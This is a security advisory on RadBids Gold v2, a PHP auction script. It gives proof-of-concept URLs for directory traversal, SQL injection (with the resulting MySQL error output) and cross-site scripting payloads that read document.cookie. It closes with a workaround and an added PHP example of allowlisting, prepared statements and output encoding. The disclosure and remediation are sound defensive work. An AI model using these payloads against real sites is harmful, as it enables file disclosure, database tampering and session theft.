RadBids is "a powerful php/mySQL powered ebay type of auction script". RadBids is vulnerable to multiple cross site scripting, SQL injection and directory traversal vulnerabilities.
Credit:
The information has been provided by Diabolic Crab.
Vulnerable Systems:
* RadBids Gold v2
Proof of Concept Exploits:
Directory Traversal:
The following URL will include the file named by the read parameter (arbitrary_file is a placeholder) in the results returned by the server:
http://localhost/auciton_software/index.php?read=arbitrary_file
SQL Injection:
The following URL can be used to trigger the SQL injection vulnerability:
http://localhost/auciton_software/index.php?a=listings&mode='SQL_INJECTION&order=name&cat=
The result returned will look something like:
SELECT id, area, radbids_listings.moderated, name, type, featured, hot, urgent, detailview, viewcount, COUNT(radbids_bids.pid) AS bids, AVG(radbids_bids.price) AS average, MAX(radbids_bids.dateposted) AS lastbid, radbids_listings.dateposted, UNIX_TIMESTAMP(radbids_listings.dateposted) AS pdate, UNIX_TIMESTAMP(dateexpire)-UNIX_TIMESTAMP(NOW()) AS timeleft, radbids_rate.avgrate, min_bid, bid_inc, buynow, dateawarded, listing_type FROM radbids_listings LEFT JOIN radbids_bids ON radbids_listings.id=radbids_bids.pid LEFT JOIN radbids_rate ON radbids_listings.id=radbids_rate.pid WHERE GROUP BY id ORDER BY name, dateposted DESC LIMIT 0,25
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'GROUP BY id ORDER BY name, dateposted DESC LIMIT 0,25' at line 28
SELECT id, area, radbids_listings.moderated, name, type, featured, hot, urgent, detailview, viewcount, COUNT(radbids_bids.pid) AS bids, AVG(radbids_bids.price) AS average, MAX(radbids_bids.dateposted) AS lastbid, radbids_listings.dateposted, UNIX_TIMESTAMP(dateexpire)-UNIX_TIMESTAMP(NOW()) AS timeleft, radbids_rate.avgrate, min_bid, bid_inc, buynow, dateawarded, listing_type FROM radbids_listings LEFT JOIN radbids_bids ON radbids_listings.id=radbids_bids.pid LEFT JOIN radbids_rate ON radbids_listings.id=radbids_rate.pid WHERE GROUP BY id ORDER BY name, dateposted DESC
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'GROUP BY id ORDER BY name, dateposted DESC' at line 27
Cross Site Scripting:
The following URLs can be used to inject arbitrary HTML and/or JavaScript:
http://localhost/auciton_software/faq.php?farea=%22%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E
http://localhost/auciton_software/index.php?a=listings&mode=1&cat=%22%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E&order=name
http://localhost/auciton_software/index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E&cat=
http://localhost/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E
Workaround:
Using htmlspecialchars(), mysql_escape_string(), mysql_real_escape_string() and similar functions to validate and escape user input before passing it to the MySQL database, or before echoing it to the page, would solve these problems.
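As an added example (not part of the advisory and not RadBids code), the PHP below applies the three fixes the workaround describes to hypothetical handlers for the parameters the proof-of-concept URLs name (read, mode, order, area). It assumes an open mysqli connection in $db, an include directory named pages/, and a listing_type column as the target of the mode parameter; the table name radbids_listings and the sortable columns are taken from the quoted query, everything else is constructed. Prepared statements via mysqli stand in for mysql_real_escape_string(), because the ext/mysql functions the workaround names were removed in PHP 7.0.

```php
<?php
// Added example, not RadBids code. Hypothetical handlers showing the three
// fixes the advisory's workaround calls for. Column names other than those
// in the quoted query are assumptions; the allowlists are constructed.

declare(strict_types=1);

// --- Directory traversal (index.php?read=...) ---------------------------
// Never build a filesystem path from the raw parameter. Map the request
// through a fixed allowlist and treat anything else as "not found".
function resolve_page(string $requested): ?string
{
    $pages = [                                   // constructed allowlist
        'faq'   => __DIR__ . '/pages/faq.inc.php',
        'terms' => __DIR__ . '/pages/terms.inc.php',
    ];
    return $pages[$requested] ?? null;
}

// --- SQL injection (index.php?a=listings&mode=...&order=...) -----------
// The value goes in as a bound parameter, so a quote in mode= stays data
// and can no longer break the WHERE clause as in the quoted error. The
// ORDER BY column cannot be bound, so it is chosen from an allowlist of
// known column names instead of being spliced in from order=.
function load_listings(mysqli $db, string $mode, string $order): array
{
    $sortable = ['name', 'dateposted', 'viewcount'];       // columns from the quoted query
    $orderBy  = in_array($order, $sortable, true) ? $order : 'dateposted';

    $stmt = $db->prepare(
        'SELECT id, name, dateposted FROM radbids_listings'
        . ' WHERE listing_type = ?'                        // assumed meaning of mode
        . " ORDER BY $orderBy DESC LIMIT 0,25"
    );
    $stmt->bind_param('s', $mode);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// --- Cross-site scripting (faq.php?farea=..., index.php?a=myareas&area=...) --
// Encode at output time, every time a value lands in HTML. ENT_QUOTES covers
// both the double-quoted and single-quoted attribute contexts the advisory's
// URLs break out of; ENT_SUBSTITUTE keeps invalid UTF-8 from emptying the output.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// --- Request handling with the helpers above ----------------------------
$read = (string)($_GET['read'] ?? '');
if ($read !== '') {
    $page = resolve_page($read);
    if ($page === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    include $page;                                // only an allowlisted path gets here
}

if (($_GET['a'] ?? '') === 'listings' && isset($db)) {
    $rows = load_listings($db, (string)($_GET['mode'] ?? ''), (string)($_GET['order'] ?? ''));
    foreach ($rows as $row) {
        echo '<li>' . h($row['name']) . '</li>';    // encode on the way out as well
    }
}

$area = (string)($_GET['area'] ?? '');
echo '<input name="area" value="' . h($area) . '">';
```

The allowlist approach for read= and order= is deliberate: escaping cannot make an arbitrary string a safe file path or a safe column name, so those two parameters are validated against known values rather than escaped, while the listing filter and the echoed area value are the cases where parameter binding and htmlspecialchars() respectively are the right tool.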